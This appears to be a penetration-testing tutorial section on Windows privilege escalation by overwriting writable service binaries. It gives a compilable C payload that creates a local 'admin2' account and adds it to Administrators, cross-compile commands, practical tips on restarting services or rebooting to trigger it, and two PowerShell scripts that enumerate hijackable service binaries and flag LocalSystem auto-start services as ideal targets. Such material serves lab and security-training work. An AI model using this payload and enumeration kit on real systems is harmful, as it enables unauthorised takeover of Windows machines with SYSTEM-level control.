Binary hijacking
Check whether a binary (e.g. the one a service starts) is writable by you or by a group you belong to:
PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Users:(F)
NT AUTHORITY\Authenticated Users:(RX)
Legend (icacls simple rights; a rule may also carry (I) = inherited, (OI) = object inherit, (CI) = container inherit):
- F = full access
- M = modify access
- RX = read and execute access
- R = read-only access
- W = write-only access
In the output above BUILTIN\Users has F on httpd.exe, so any local user can overwrite the service binary.
If so, replace it with a more useful executable, like this one. It runs with the privileges of the service account (often LocalSystem), creates a local user and adds it to the local Administrators group:
#include <stdlib.h>

/* Payload for a writable service binary: executed by the Service Control
   Manager with the service's account. The password must satisfy the local
   password policy or "net user" fails silently from the attacker's view. */
int main(void)
{
    int i;
    i = system("net user admin2 password123! /add");
    i = system("net localgroup administrators admin2 /add");
    return i;
}
Compile this for the correct target architecture (check with systeminfo or [Environment]::Is64BitOperatingSystem) and replace the original file:
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
(use i686-w64-mingw32-gcc for a 32-bit target)
Two caveats before you overwrite anything. A running executable is locked, so the copy fails with a sharing violation until the service is stopped: check with sc qc <service> / Get-Service whether you are allowed to stop and start it, or whether it starts automatically so a reboot (needs SeShutdownPrivilege, see whoami /priv) or the next boot triggers it. And because this payload never talks to the Service Control Manager, the service start will be reported as failed (error 1053) after the SCM timeout; both net commands have long finished by then.
To run the same check against every running process in one PowerShell pipeline (the naive version that compares the ACE principal to the user name and greps the rights for the word 'Write' misses exactly the case above, since the write right comes through BUILTIN\Users and is granted as FullControl):
# SIDs the current token carries (user plus all groups), so rights granted to
# e.g. BUILTIN\Users or Authenticated Users count, not only rights granted to
# the user name itself.
$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

# Any of these rights lets us change the file's content. FullControl and Modify
# do not contain the word 'Write' in their names, so test the bits instead.
$writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl)

Get-Process | ForEach-Object {
    $exePath = $_.Path
    # Protected processes and processes of other users expose no path: skip them
    if (-not $exePath) { return }
    try {
        $acl = Get-Acl -LiteralPath $exePath
        $userHasWritePermission = $false
        foreach ($accessRule in $acl.Access) {
            # Resolve the rule's principal to a SID and compare it with our token
            $sid = $accessRule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            if ($mySids -notcontains $sid) { continue }
            if (([int]$accessRule.FileSystemRights -band $writeMask) -eq 0) { continue }
            # An explicit Deny for one of our SIDs overrides any Allow
            if ($accessRule.AccessControlType -eq 'Deny') { $userHasWritePermission = $false; break }
            $userHasWritePermission = $true
        }
        [pscustomobject]@{
            ProcessName            = $_.ProcessName
            ExecutablePath         = $exePath
            UserHasWritePermission = $userHasWritePermission
        }
    } catch {
        # Inaccessible path or ACL (e.g. a SYSTEM-only binary)
        [pscustomobject]@{
            ProcessName            = $_.ProcessName
            ExecutablePath         = $exePath
            UserHasWritePermission = 'Error: ' + $_.Exception.Message
        }
    }
} | Sort-Object ExecutablePath -Unique | Format-Table UserHasWritePermission, ExecutablePath
Note that in a UAC-filtered (non-elevated) administrator token the Administrators group is present for deny-only, but still appears in $identity.Groups, so such a session over-reports; run the check from the low-privileged account you actually want to escalate from.
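The process-based check only sees services that are running right now and only those whose path the process exposes. The following added example (not code from the original page) enumerates the installed services via Win32_Service instead, extracts the binary from the service's command line, and reports both the binary and its parent directory as writable or not, together with the account the service runs as and its start mode, which is what decides whether a hijack is worth it. The function names Get-TokenSids, Get-ServiceBinaryPath and Test-WritableByToken are this example's own; everything else is built-in PowerShell.

```powershell
# Added example: find service binaries (or their directories) the current
# token can write to. Built-in cmdlets only; no external tools.

function Get-TokenSids {
    # Every SID the current token carries: the user plus all group memberships.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Get-ServiceBinaryPath {
    # Win32_Service.PathName is either quoted ("C:\Program Files\x\svc.exe" -arg)
    # or unquoted with arguments (C:\xampp\apache\bin\httpd.exe -k runservice).
    param([string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }   # up to first .exe
    return $PathName.Trim()
}

function Test-WritableByToken {
    # Approximates the kernel's access check: an applicable Deny ACE with write
    # bits wins, otherwise any applicable Allow ACE with write bits grants write.
    param([string]$Path, [string[]]$Sids)
    $writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                       [System.Security.AccessControl.FileSystemRights]::Modify -bor
                       [System.Security.AccessControl.FileSystemRights]::FullControl)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    $allowed = $false
    foreach ($rule in $acl.Access) {
        $sid = $rule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        if ($Sids -notcontains $sid) { continue }
        if (([int]$rule.FileSystemRights -band $writeMask) -eq 0) { continue }
        if ($rule.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

$sids = Get-TokenSids
Get-CimInstance Win32_Service | ForEach-Object {
    $bin = Get-ServiceBinaryPath $_.PathName
    if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { return }
    # A writable parent directory is as good as a writable file: the original
    # can be renamed or replaced once the service is stopped.
    try   { $fileWritable = Test-WritableByToken -Path $bin -Sids $sids }
    catch { $fileWritable = "Error: $($_.Exception.Message)" }
    try   { $dirWritable = Test-WritableByToken -Path (Split-Path -LiteralPath $bin -Parent) -Sids $sids }
    catch { $dirWritable = "Error: $($_.Exception.Message)" }
    [pscustomobject]@{
        Service      = $_.Name
        State        = $_.State
        StartMode    = $_.StartMode
        RunsAs       = $_.StartName
        Binary       = $bin
        FileWritable = $fileWritable
        DirWritable  = $dirWritable
    }
} | Where-Object { $_.FileWritable -eq $true -or $_.DirWritable -eq $true } |
    Format-Table -AutoSize
```

Drop the final Where-Object to see every service, including the ones whose ACL could not be read. A hit with RunsAs = LocalSystem and StartMode = Auto is the ideal target: the payload runs as SYSTEM at the next boot even if you cannot restart the service yourself.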